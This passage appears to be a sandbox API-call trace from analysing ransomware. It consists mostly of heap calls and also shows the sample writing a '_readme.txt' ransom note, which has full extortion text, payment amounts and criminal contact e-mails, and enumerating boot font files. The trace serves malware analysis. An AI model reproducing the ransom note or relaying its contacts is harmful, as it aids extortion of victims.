out: hHeap=0x620000) returned 1 [0228.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.550] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0228.550] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.550] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.550] PathFindFileNameW (pszPath="") returned="" [0228.550] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.551] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.551] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.551] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.551] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0228.551] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.551] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0228.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.553] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.553] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.553] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.553] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0228.554] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0228.554] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.554] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 